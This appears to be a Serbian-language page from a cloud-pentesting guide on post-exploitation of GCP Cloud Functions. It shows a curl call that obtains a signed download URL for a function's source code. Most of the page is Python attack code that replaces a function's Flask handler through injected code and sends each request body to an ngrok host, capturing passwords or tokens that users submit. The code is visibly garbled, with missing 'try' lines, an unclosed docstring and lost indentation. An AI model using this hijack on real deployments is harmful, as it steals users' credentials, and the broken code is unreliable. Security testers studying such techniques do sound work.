GCP - Cloud Functions Post Exploitation

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GCP - Cloud Functions Enum


Sa ovlašćenjem možete dobiti potpisan URL kako biste mogli preuzeti izvorni kod Cloud funkcije:

curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'

Ukradi zahteve Cloud funkcije

Ako Cloud funkcija upravlja osetljivim informacijama koje korisnici šalju (npr. lozinke ili tokeni), sa dovoljno privilegija možete izmeniti izvorni kod funkcije i izfiltrirati ove informacije.

Osim toga, Cloud funkcije koje se izvršavaju u pythonu koriste flask za izlaganje veb servera, ako nađete ranjivost ubacivanja koda unutar procesa flaksa (npr. ranjivost SSTI), moguće je zameniti rukovaoca funkcijom koja će primiti HTTP zahteve za zlonamernu funkciju koja može izfiltrirati zahtev pre nego što ga prosledi legitimnom rukovaocu.

Na primer, ovaj kod implementira napad:

import functions_framework

# Some python handler code
def hello_http(request, last=False, error=""):
"""HTTP Cloud Function.
request (flask.Request): The request object.
The response text, or any set of values that can be turned into a
Response object using `make_response`

if not last:
return injection()
if error:
return error
return "Hello World!"

# Attacker code to inject
# Code based on the one from https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py

new_function = """
def exfiltrate(request):
from urllib import request as urllib_request
req = urllib_request.Request("https://8b01-81-33-67-85.ngrok-free.app", data=bytes(str(request._get_current_object().get_data()), "utf-8"), method="POST")
urllib_request.urlopen(req, timeout=0.1)
except Exception as e:
if not "read operation timed out" in str(e):
return str(e)

return ""

def new_http_view_func_wrapper(function, request):
def view_func(path):
error = exfiltrate(request)
return function(request._get_current_object(), last=True, error=error)
except Exception as e:
return str(e)

return view_func

def injection():
global new_function
from flask import current_app as app
import flask
import os
import importlib
import sys

if os.access('/tmp', os.W_OK):
new_function_path = "/tmp/function.py"
with open(new_function_path, "w") as f:
os.chmod(new_function_path, 0o777)

if not os.path.exists('/tmp/function.py'):
return "/tmp/function.py doesn't exists"

# Get relevant function names
handler_fname = os.environ.get("FUNCTION_TARGET") # Cloud Function env variable indicating the name of the function to habdle requests
source_path = os.environ.get("FUNCTION_SOURCE", "./main.py") # Path to the source file of the Cloud Function (./main.py by default)
realpath = os.path.realpath(source_path) # Get full path

# Get the modules representations
spec_handler = importlib.util.spec_from_file_location("main_handler", realpath)
module_handler = importlib.util.module_from_spec(spec_handler)

spec_backdoor = importlib.util.spec_from_file_location('backdoor', '/tmp/function.py')
module_backdoor = importlib.util.module_from_spec(spec_backdoor)

# Load the modules inside the app context
with app.app_context():

# make the cloud funtion use as handler the new function
prev_handler = getattr(module_handler, handler_fname)
new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper')
app.view_functions["run"] = new_func_wrap(prev_handler, flask.request)
return "Injection completed!"

except Exception as e:
return str(e)

Last updated